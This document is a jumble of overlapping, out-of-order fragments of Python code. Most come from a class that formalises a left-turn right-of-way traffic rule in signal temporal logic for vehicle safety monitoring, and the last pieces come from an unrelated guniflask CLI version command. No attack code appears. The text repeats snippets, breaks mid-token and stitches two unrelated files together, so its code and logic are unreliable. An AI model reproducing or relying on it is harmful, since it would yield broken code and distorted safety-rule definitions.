(d_lon_cj<0))\" # the check on d_lon_cj in", "specification phi_lt_resp = f\"always (({S} and (next (not {S}))) -> (next {P_leftturn}))\" return", "stationary # then, we just remove the `d_f_brake` term from the calculation d_b_prebr", "to match the rtamt spec language (e.g. non-strict release) - Def. Release: phi_1", "+ 1 / 2 * self._p['a_lon_maxacc'] * self._p['rho'] ** 2 d_b_brake_num = ((data[v_field]", "to give way substantially impede a road user who has the right of", "time in seconds `rho_dt`: reaction time in number of steps (note: we use", "seconds `rho_dt`: reaction time in number of steps (note: we use `next` operator,", "(({S} and (next (not {S}))) -> (next {P_leftturn}))\" return phi_lt_resp @property def demo_spec(self):", "the assumption that v_front = 0, because a junction is stationary # then,", "of way when the latter turns into the other road.>> Intuition behind formalization:", "0, because a junction is stationary # then, we just remove the `d_f_brake`", "\"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj > d_lon_min_cj)\" E_not_injunc = \"(is_e_in_junc <= 0)\"", "longitudinal acceleration `rho`: reaction time in seconds `rho_dt`: reaction time in number of", "R^ns_{0:rho} (a_lon(ego) <= a_lon_maxacc) plan_brake = (release_condition) R^ns_{rho:inf} (a_lon(ego) <= -a_lon_minbr) release_condition =", "d_lon_safe(ego,j) car_can_brake = dist(car,j) > d_lon_safe(car,j) plan = plan_react AND plan_brake plan_react =", "check output assert all([s in out_signals for s in self.variables]), f\"missing out signals", "input signals out_signals = {} out_signals[\"time\"] = data[\"time\"] out_signals[\"a_lon_e\"] = data[\"a_lon_e\"] out_signals[\"v_lon_e\"] =", "out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals =", "then, we just remove the `d_f_brake` term from the calculation d_b_prebr = data[v_field]", "= (ego_can_brake AND NOT(next(ego_can_brake))) AND (car_can_brake) AND (is_in_junction(ego, j)<=0) ego_can_brake = dist(ego,j) >", "reaction time in seconds `rho_dt`: reaction time in number of steps (note: we", "out_signals = {} out_signals[\"time\"] = data[\"time\"] out_signals[\"a_lon_e\"] = data[\"a_lon_e\"] out_signals[\"v_lon_e\"] = data[\"v_lon_e\"] out_signals[\"d_lon_ej\"]", "import numpy as np from stl_rules.stl_rule import STLRule class TrafficRuleLeftTurn(STLRule): \"\"\" This rule", "(d_lon_cj<0))\" # the check on d_lon_cj in case d has pos-neg interpret. A_lon_e_maxacc", "a road user who has the right of way. [...] Nor must a", "{k: list(v[begin:end]) for k, v in out_signals.items()} # check output assert all([s in", "self._p['a_lon_maxacc'] * self._p['rho'] ** 2 d_b_brake_num = ((data[v_field] + self._p['rho'] * self._p['a_lon_maxacc']) **", "\"v_lon_e\", \"a_lon_e\"] @property def types(self): return [\"int\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\",", "until S = f\"(({E_canbrake} and not(next({E_canbrake}))) and (not({C_canbrake})) and ({E_not_injunc}))\" P_react = f\"(not(not({release_cond})", "cars approaching a junction in opposite directions: <<[...] They may only proceed if", "= f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_minbr})))\" P_leftturn = f\"({P_react} and {P_brake})\" # resulting", "acceleration `rho`: reaction time in seconds `rho_dt`: reaction time in number of steps", "out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] = data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\")", "\"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"] assert all([s in data for s in obs_signals]), f\"missing in", "who has the right of way. [...] Nor must a road user who", "the Traffic Rule for two cars approaching a junction in opposite directions: <<[...]", "Note: this condition takes into account 2 possible implementation of the distance metric", "- Def. Non-Strict Release: phi_1 R^ns_I phi_2 = phi_1 R_I (phi_1 or phi_2)", "formalization: premise = \"ego is approaching but not occupying the junction j, other", "np.ndarray], begin:int=5, end:int=1000) -> Dict[str, List]: # check input obs_signals = [\"elapsed_time\", \"v_lon_ego\",", "\"a_lon_e\"] @property def types(self): return [\"int\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\"]", "`rho_dt`: reaction time in number of steps (note: we use `next` operator, we", "for s in obs_signals]), f\"missing in signals ({obs_signals} not in {data.keys()})\" # generate", "\"a_lon_e\", \"v_lon_e\", \"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"] assert all([s in data for s in", "{S})) -> (next {P_leftturn})\" return phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str, np.ndarray], v_field: str)", "= {k: list(v[begin:end]) for k, v in out_signals.items()} # check output assert all([s", "in case d has pos-neg interpret. A_lon_e_maxacc = f\"(a_lon_e <= {self._p['a_lon_maxacc']})\" A_lon_e_minbr =", "= (release_condition) R^ns_{0:rho} (a_lon(ego) <= a_lon_maxacc) plan_brake = (release_condition) R^ns_{rho:inf} (a_lon(ego) <= -a_lon_minbr)", "junction, d(car,j)=inf, then car_can_brake and release_condition is true *Rewriting*: some operators have been", "2) d_b_brake_den = 2 * self._p['a_lon_minbr'] d_b_brake = d_b_brake_num / d_b_brake_den d_diff =", "s in self.variables]), f\"missing out signals ({self.variables} not in {out_signals.keys()})\" return out_signals def", "crosses junction, d(car,j)=inf, then car_can_brake and release_condition is true *Rewriting*: some operators have", "data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] = data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"]", "{data.keys()})\" # generate output signals from input signals out_signals = {} out_signals[\"time\"] =", "\"v_lon_car\", \"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\", \"d_car_j\"] assert all([s in data for s in obs_signals]),", "Dict[str, np.ndarray]) -> Dict[str, List]: # check input obs_signals = [\"time\", \"a_lon_e\", \"v_lon_e\",", "only change is the assumption that v_front = 0, because a junction is", "R^ns_{rho:inf} (a_lon(ego) <= -a_lon_minbr) release_condition = (v_lon(ego) <= 0) OR (dist(car, j) <=", "the rtamt spec language (e.g. non-strict release) - Def. Release: phi_1 R_I phi_2", "\"is_e_in_junc\"] assert all([s in data for s in obs_signals]), f\"missing in signals ({obs_signals}", "<= 0) OR (dist(car, j) <= 0) OR (car_can_brake) Note: this condition takes", "nor substantially impede a road user who has the right of way. [...]", "f\"({V_lon_e_stop} or {C_react_or_crossed})\" # specification # note: non-strict release operator is written using", "out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] = data[\"d_car_j\"] out_signals[\"is_e_in_junc\"]", "and (next (not {S}))) -> (next {P_leftturn}))\" return phi_lt_resp @property def demo_spec(self): #", "A_lon_e_minbr = f\"(a_lon_e <= -{self._p['a_lon_minbr']})\" release_cond = f\"({V_lon_e_stop} or {C_react_or_crossed})\" # specification #", "a road user who has the right of way when the latter turns", "then car_can_brake and release_condition is true *Rewriting*: some operators have been rewritten to", "is written using not and until S = f\"(({E_canbrake} and not(next({E_canbrake}))) and (not({C_canbrake}))", "= data[\"time\"] out_signals[\"a_lon_e\"] = data[\"a_lon_e\"] out_signals[\"v_lon_e\"] = data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"] =", "def types(self): return [\"int\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\"] def __init__(self,", "= \"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj > d_lon_min_cj)\" E_not_injunc = \"(is_e_in_junc <=", "assert all([p in rss_params for p in required_parameters]) self._p = {p: rss_params[p] for", "[\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\", \"d_car_j\"] assert all([s in data for s", "not(phi_2)) - Def. Non-Strict Release: phi_1 R^ns_I phi_2 = phi_1 R_I (phi_1 or", "for k, v in out_signals.items()} # check output assert all([s in out_signals for", "np.zeros_like(d_diff)) return d_lon_min def generate_signals_for_demo(self, data: Dict[str, np.ndarray], begin:int=5, end:int=1000) -> Dict[str, List]:", "we need discrete-time stl) `max_steps`: overestimation of the episode length, used to monitor", "not in {out_signals.keys()})\" return out_signals def generate_signals(self, data: Dict[str, np.ndarray]) -> Dict[str, List]:", "car crossed the intersection\" Formalization in STL: premise = (ego_can_brake AND NOT(next(ego_can_brake))) AND", "@property def variables(self): return [\"time\", \"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\", \"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"] @property", "= self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals = {k: list(v) for k, v in out_signals.items()} #", "np.ndarray]) -> Dict[str, List]: # check input obs_signals = [\"time\", \"a_lon_e\", \"v_lon_e\", \"v_lon_c\",", "0)\" C_react_or_crossed = f\"({C_canbrake} or (d_lon_cj<0))\" # the check on d_lon_cj in case", "(not {S}))) -> (next {P_leftturn}))\" return phi_lt_resp @property def demo_spec(self): # predicates E_canbrake", "plan_brake = (release_condition) R^ns_{rho:inf} (a_lon(ego) <= -a_lon_minbr) release_condition = (v_lon(ego) <= 0) OR", "monitoring `a_lon_minbr`, `a_lon_maxbr` : min, max longitudinal acceleration when breaking `a_lon_minacc`, `a_lon_maxacc` :", "\"rho_dt\", \"sim_dt\", \"max_steps\"] assert all([p in rss_params for p in required_parameters]) self._p =", "List]: # check input obs_signals = [\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\", \"d_car_j\"]", "{P_brake})\" # resulting specification phi_lt_resp = f\"(next (not {S})) -> (next {P_leftturn})\" return", "`a_lon_maxbr` : min, max longitudinal acceleration when breaking `a_lon_minacc`, `a_lon_maxacc` : min, max", "rtamt spec language (e.g. non-strict release) - Def. Release: phi_1 R_I phi_2 =", "(next {P_leftturn})\" return phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str, np.ndarray], v_field: str) -> np.ndarray:", "\"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\", \"d_car_j\"] assert all([s in data for s in obs_signals]), f\"missing", "variables(self): return [\"time\", \"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\", \"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"] @property def types(self):", "d(car,j)<0 and then release_condition is true (the ego can cross) If only-pos, when", "episode length, used to monitor open intervals \"\"\" required_parameters = [\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\",", "d_lon_min def generate_signals_for_demo(self, data: Dict[str, np.ndarray], begin:int=5, end:int=1000) -> Dict[str, List]: # check", "user who has the right of way when the latter turns into the", "\"(v_lon_e <= 0)\" C_react_or_crossed = f\"({C_canbrake} or (d_lon_cj<0))\" # the check on d_lon_cj", "phi_lt_resp = f\"always (({S} and (next (not {S}))) -> (next {P_leftturn}))\" return phi_lt_resp", "# predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj > d_lon_min_cj)\" E_not_injunc", "of way. [...] Nor must a road user who is obliged to give", "operator, we need discrete-time stl) `max_steps`: overestimation of the episode length, used to", "(ego_can_brake AND NOT(next(ego_can_brake))) AND (car_can_brake) AND (is_in_junction(ego, j)<=0) ego_can_brake = dist(ego,j) > d_lon_safe(ego,j)", "directions: <<[...] They may only proceed if they can see that they will", "output assert all([s in out_signals for s in self.variables]), f\"missing out signals ({self.variables}", "out_signals = {} out_signals[\"elapsed_time\"] = data[\"elapsed_time\"] - data[\"elapsed_time\"][0] out_signals[\"time\"] = np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0])", "zero-velocity or other car crossed the intersection\" Formalization in STL: premise = (ego_can_brake", "the latter turns into the other road.>> Intuition behind formalization: premise = \"ego", "release operator is written using not and until S = f\"(({E_canbrake} and not(next({E_canbrake})))", "ego_can_brake = dist(ego,j) > d_lon_safe(ego,j) car_can_brake = dist(car,j) > d_lon_safe(car,j) plan = plan_react", "NOT(next(ego_can_brake))) AND (car_can_brake) AND (is_in_junction(ego, j)<=0) ego_can_brake = dist(ego,j) > d_lon_safe(ego,j) car_can_brake =", "from typing import Dict, List import numpy as np from stl_rules.stl_rule import STLRule", "input obs_signals = [\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\", \"d_car_j\"] assert all([s in", "\"d_lon_min_cj\", \"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"] @property def types(self): return [\"int\", \"float\", \"float\", \"float\", \"float\",", "data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals", "phi_2 = not(not(phi_1) Until_i not(phi_2)) - Def. Non-Strict Release: phi_1 R^ns_I phi_2 =", "= (release_condition) R^ns_{rho:inf} (a_lon(ego) <= -a_lon_minbr) release_condition = (v_lon(ego) <= 0) OR (dist(car,", "predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj > d_lon_min_cj)\" E_not_injunc =", "dist(ego,j) > d_lon_safe(ego,j) car_can_brake = dist(car,j) > d_lon_safe(car,j) plan = plan_react AND plan_brake", "in number of steps (note: we use `next` operator, we need discrete-time stl)", "(e.g. non-strict release) - Def. Release: phi_1 R_I phi_2 = not(not(phi_1) Until_i not(phi_2))", "check on d_lon_cj in case d has pos-neg interpret. A_lon_e_maxacc = f\"(a_lon_e <=", "f\"(a_lon_e <= {self._p['a_lon_maxacc']})\" A_lon_e_minbr = f\"(a_lon_e <= -{self._p['a_lon_minbr']})\" release_cond = f\"({V_lon_e_stop} or {C_react_or_crossed})\"", "\"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"] assert all([s in data for s in obs_signals]), f\"missing", "(dist(car, j) <= 0) OR (car_can_brake) Note: this condition takes into account 2", "number of steps (note: we use `next` operator, we need discrete-time stl) `max_steps`:", "impede a road user who has the right of way. [...] Nor must", "pos-neg interpret. A_lon_e_maxacc = f\"(a_lon_e <= {self._p['a_lon_maxacc']})\" A_lon_e_minbr = f\"(a_lon_e <= -{self._p['a_lon_minbr']})\" release_cond", "E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj > d_lon_min_cj)\" E_not_injunc = \"(is_e_in_junc", "# generate output signals from input signals out_signals = {} out_signals[\"elapsed_time\"] = data[\"elapsed_time\"]", "= {k: list(v) for k, v in out_signals.items()} # check output assert all([s", "operators have been rewritten to match the rtamt spec language (e.g. non-strict release)", "approaching a junction in opposite directions: <<[...] They may only proceed if they", "j)<=0) ego_can_brake = dist(ego,j) > d_lon_safe(ego,j) car_can_brake = dist(car,j) > d_lon_safe(car,j) plan =", "\"\"\" This rule implement the Traffic Rule for two cars approaching a junction", "Def. Non-Strict Release: phi_1 R^ns_I phi_2 = phi_1 R_I (phi_1 or phi_2) \"\"\"", "out_signals[\"d_lon_cj\"] = data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data,", "data: Dict[str, np.ndarray], begin:int=5, end:int=1000) -> Dict[str, List]: # check input obs_signals =", "phi_1 R_I phi_2 = not(not(phi_1) Until_i not(phi_2)) - Def. Non-Strict Release: phi_1 R^ns_I", "v_field: str) -> np.ndarray: # note: the only change is the assumption that", "data for s in obs_signals]), f\"missing in signals ({obs_signals} not in {data.keys()})\" #", "Def. Release: phi_1 R_I phi_2 = not(not(phi_1) Until_i not(phi_2)) - Def. Non-Strict Release:", "return phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str, np.ndarray], v_field: str) -> np.ndarray: # note:", "change is the assumption that v_front = 0, because a junction is stationary", "car has no time to brake\" proper response = \"ego brakes until reach", "\"float\", \"float\", \"float\", \"float\", \"float\"] def __init__(self, rss_params): \"\"\" :param rss_params: static parameters", "the episode length, used to monitor open intervals \"\"\" required_parameters = [\"a_lon_minbr\", \"a_lon_maxacc\",", "P_react = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_maxacc})))\" P_brake = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or", ": min, max longitudinal acceleration `rho`: reaction time in seconds `rho_dt`: reaction time", "rewritten to match the rtamt spec language (e.g. non-strict release) - Def. Release:", "<= 0) OR (car_can_brake) Note: this condition takes into account 2 possible implementation", "steps (note: we use `next` operator, we need discrete-time stl) `max_steps`: overestimation of", "or {A_lon_e_maxacc})))\" P_brake = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_minbr})))\" P_leftturn = f\"({P_react} and", "data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] = data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data,", "R_I (phi_1 or phi_2) \"\"\" @property def variables(self): return [\"time\", \"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\",", "= plan_react AND plan_brake plan_react = (release_condition) R^ns_{0:rho} (a_lon(ego) <= a_lon_maxacc) plan_brake =", "# check output assert all([s in out_signals for s in self.variables]), f\"missing out", "+ self._p['rho'] * self._p['a_lon_maxacc']) ** 2) d_b_brake_den = 2 * self._p['a_lon_minbr'] d_b_brake =", "{} out_signals[\"time\"] = data[\"time\"] out_signals[\"a_lon_e\"] = data[\"a_lon_e\"] out_signals[\"v_lon_e\"] = data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"]", "resulting specification phi_lt_resp = f\"(next (not {S})) -> (next {P_leftturn})\" return phi_lt_resp def", "time to brake\" proper response = \"ego brakes until reach zero-velocity or other", "- Def. Release: phi_1 R_I phi_2 = not(not(phi_1) Until_i not(phi_2)) - Def. Non-Strict", "\"ego is approaching but not occupying the junction j, other car has no", "takes into account 2 possible implementation of the distance metric (only-positive or pos-neg)", "out signals ({self.variables} not in {out_signals.keys()})\" return out_signals def generate_signals(self, data: Dict[str, np.ndarray])", "[...] Nor must a road user who is obliged to give way substantially", "data[\"time\"] out_signals[\"a_lon_e\"] = data[\"a_lon_e\"] out_signals[\"v_lon_e\"] = data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"]", "way when the latter turns into the other road.>> Intuition behind formalization: premise", "for s in self.variables]), f\"missing out signals ({self.variables} not in {out_signals.keys()})\" return out_signals", "(phi_1 or phi_2) \"\"\" @property def variables(self): return [\"time\", \"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\",", "Intuition behind formalization: premise = \"ego is approaching but not occupying the junction", "from input signals out_signals = {} out_signals[\"elapsed_time\"] = data[\"elapsed_time\"] - data[\"elapsed_time\"][0] out_signals[\"time\"] =", "note: the only change is the assumption that v_front = 0, because a", "* self._p['a_lon_maxacc']) ** 2) d_b_brake_den = 2 * self._p['a_lon_minbr'] d_b_brake = d_b_brake_num /", "(not {S})) -> (next {P_leftturn})\" return phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str, np.ndarray], v_field:", "and not(next({E_canbrake}))) and (not({C_canbrake})) and ({E_not_injunc}))\" P_react = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_maxacc})))\"", "spec language (e.g. non-strict release) - Def. Release: phi_1 R_I phi_2 = not(not(phi_1)", "the distance metric (only-positive or pos-neg) If pos-neg, when car crosses junction, d(car,j)<0", "rss_params: static parameters for rss monitoring `a_lon_minbr`, `a_lon_maxbr` : min, max longitudinal acceleration", "for rss monitoring `a_lon_minbr`, `a_lon_maxbr` : min, max longitudinal acceleration when breaking `a_lon_minacc`,", "* self._p['a_lon_maxacc'] * self._p['rho'] ** 2 d_b_brake_num = ((data[v_field] + self._p['rho'] * self._p['a_lon_maxacc'])", "brake\" proper response = \"ego brakes until reach zero-velocity or other car crossed", "{A_lon_e_maxacc})))\" P_brake = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_minbr})))\" P_leftturn = f\"({P_react} and {P_brake})\"", "\"sim_dt\", \"max_steps\"] assert all([p in rss_params for p in required_parameters]) self._p = {p:", "written using not and until S = f\"(({E_canbrake} and not(next({E_canbrake}))) and (not({C_canbrake})) and", "d_b_brake = d_b_brake_num / d_b_brake_den d_diff = d_b_prebr + d_b_brake d_lon_min = np.maximum(d_diff,", "or (d_lon_cj<0))\" # the check on d_lon_cj in case d has pos-neg interpret.", "typing import Dict, List import numpy as np from stl_rules.stl_rule import STLRule class", "who is obliged to give way substantially impede a road user who has", "non-strict release) - Def. Release: phi_1 R_I phi_2 = not(not(phi_1) Until_i not(phi_2)) -", "Non-Strict Release: phi_1 R^ns_I phi_2 = phi_1 R_I (phi_1 or phi_2) \"\"\" @property", "f\"(next (not {S})) -> (next {P_leftturn})\" return phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str, np.ndarray],", "= data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals = {k:", "when car crosses junction, d(car,j)<0 and then release_condition is true (the ego can", "not in {data.keys()})\" # generate output signals from input signals out_signals = {}", "has the right of way when the latter turns into the other road.>>", "stl) `max_steps`: overestimation of the episode length, used to monitor open intervals \"\"\"", "p in required_parameters]) self._p = {p: rss_params[p] for p in required_parameters} @property def", "{P_leftturn})\" return phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str, np.ndarray], v_field: str) -> np.ndarray: #", "\"d_lon_min_ej\", \"d_lon_min_cj\", \"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"] @property def types(self): return [\"int\", \"float\", \"float\", \"float\",", "{k: list(v) for k, v in out_signals.items()} # check output assert all([s in", "(car_can_brake) AND (is_in_junction(ego, j)<=0) ego_can_brake = dist(ego,j) > d_lon_safe(ego,j) car_can_brake = dist(car,j) >", "in out_signals for s in self.variables]), f\"missing out signals ({self.variables} not in {out_signals.keys()})\"", "the intersection\" Formalization in STL: premise = (ego_can_brake AND NOT(next(ego_can_brake))) AND (car_can_brake) AND", "= [\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\", \"d_car_j\"] assert all([s in data for", "in data for s in obs_signals]), f\"missing in signals ({obs_signals} not in {data.keys()})\"", "in {data.keys()})\" # generate output signals from input signals out_signals = {} out_signals[\"time\"]", "required_parameters} @property def spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake =", "{A_lon_e_minbr})))\" P_leftturn = f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp = f\"(next (not", "proceed if they can see that they will neither endanger nor substantially impede", "all([p in rss_params for p in required_parameters]) self._p = {p: rss_params[p] for p", "true *Rewriting*: some operators have been rewritten to match the rtamt spec language", "way substantially impede a road user who has the right of way when", "open intervals \"\"\" required_parameters = [\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\", \"rho_dt\", \"sim_dt\", \"max_steps\"] assert all([p", "generate_signals_for_demo(self, data: Dict[str, np.ndarray], begin:int=5, end:int=1000) -> Dict[str, List]: # check input obs_signals", "plan = plan_react AND plan_brake plan_react = (release_condition) R^ns_{0:rho} (a_lon(ego) <= a_lon_maxacc) plan_brake", "\"v_lon_e\", \"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"] assert all([s in data for s in obs_signals]),", "j, other car has no time to brake\" proper response = \"ego brakes", "`max_steps`: overestimation of the episode length, used to monitor open intervals \"\"\" required_parameters", "obs_signals = [\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\", \"d_car_j\"] assert all([s in data", "out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\")", "If only-pos, when car crosses junction, d(car,j)=inf, then car_can_brake and release_condition is true", "return [\"time\", \"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\", \"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"] @property def types(self): return", "def _compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str, np.ndarray], v_field: str) -> np.ndarray: # note: the only", "@property def types(self): return [\"int\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\"] def", "d_diff = d_b_prebr + d_b_brake d_lon_min = np.maximum(d_diff, np.zeros_like(d_diff)) return d_lon_min def generate_signals_for_demo(self,", "out_signals[\"elapsed_time\"] = data[\"elapsed_time\"] - data[\"elapsed_time\"][0] out_signals[\"time\"] = np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"]", "of the distance metric (only-positive or pos-neg) If pos-neg, when car crosses junction,", "out_signals.items()} # check output assert all([s in out_signals for s in self.variables]), f\"missing", "possible implementation of the distance metric (only-positive or pos-neg) If pos-neg, when car", "they will neither endanger nor substantially impede a road user who has the", "\"(is_e_in_junc <= 0)\" V_lon_e_stop = \"(v_lon_e <= 0)\" C_react_or_crossed = f\"({C_canbrake} or (d_lon_cj<0))\"", "`a_lon_minbr`, `a_lon_maxbr` : min, max longitudinal acceleration when breaking `a_lon_minacc`, `a_lon_maxacc` : min,", "{S}))) -> (next {P_leftturn}))\" return phi_lt_resp @property def demo_spec(self): # predicates E_canbrake =", "# check input obs_signals = [\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\", \"d_car_j\"] assert", "will neither endanger nor substantially impede a road user who has the right", "non-strict release operator is written using not and until S = f\"(({E_canbrake} and", "+ d_b_brake d_lon_min = np.maximum(d_diff, np.zeros_like(d_diff)) return d_lon_min def generate_signals_for_demo(self, data: Dict[str, np.ndarray],", "endanger nor substantially impede a road user who has the right of way.", "= f\"(({E_canbrake} and not(next({E_canbrake}))) and (not({C_canbrake})) and ({E_not_injunc}))\" P_react = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond}", "remove the `d_f_brake` term from the calculation d_b_prebr = data[v_field] * self._p['rho'] +", "\"\"\" :param rss_params: static parameters for rss monitoring `a_lon_minbr`, `a_lon_maxbr` : min, max" ]
[ "import __version__ @click.group() def cli_version(): pass @cli_version.command('version') def main(): \"\"\" Print the version.", "def main(): \"\"\" Print the version. \"\"\" Version().run() class Version: def run(self): print(f\"", "from guniflask_cli import __version__ @click.group() def cli_version(): pass @cli_version.command('version') def main(): \"\"\" Print", "click from guniflask_cli import __version__ @click.group() def cli_version(): pass @cli_version.command('version') def main(): \"\"\"", "guniflask_cli import __version__ @click.group() def cli_version(): pass @cli_version.command('version') def main(): \"\"\" Print the", "main(): \"\"\" Print the version. \"\"\" Version().run() class Version: def run(self): print(f\" guniflask-cli:", "@click.group() def cli_version(): pass @cli_version.command('version') def main(): \"\"\" Print the version. \"\"\" Version().run()", "version. \"\"\" Version().run() class Version: def run(self): print(f\" guniflask-cli: v{__version__}\") import guniflask print(f\"", "@cli_version.command('version') def main(): \"\"\" Print the version. \"\"\" Version().run() class Version: def run(self):", "Version().run() class Version: def run(self): print(f\" guniflask-cli: v{__version__}\") import guniflask print(f\" guniflask: v{guniflask.__version__}\")", "\"\"\" Print the version. \"\"\" Version().run() class Version: def run(self): print(f\" guniflask-cli: v{__version__}\")", "cli_version(): pass @cli_version.command('version') def main(): \"\"\" Print the version. \"\"\" Version().run() class Version:", "__version__ @click.group() def cli_version(): pass @cli_version.command('version') def main(): \"\"\" Print the version. \"\"\"", "def cli_version(): pass @cli_version.command('version') def main(): \"\"\" Print the version. \"\"\" Version().run() class", "Print the version. \"\"\" Version().run() class Version: def run(self): print(f\" guniflask-cli: v{__version__}\") import", "import click from guniflask_cli import __version__ @click.group() def cli_version(): pass @cli_version.command('version') def main():", "the version. \"\"\" Version().run() class Version: def run(self): print(f\" guniflask-cli: v{__version__}\") import guniflask", "pass @cli_version.command('version') def main(): \"\"\" Print the version. \"\"\" Version().run() class Version: def", "\"\"\" Version().run() class Version: def run(self): print(f\" guniflask-cli: 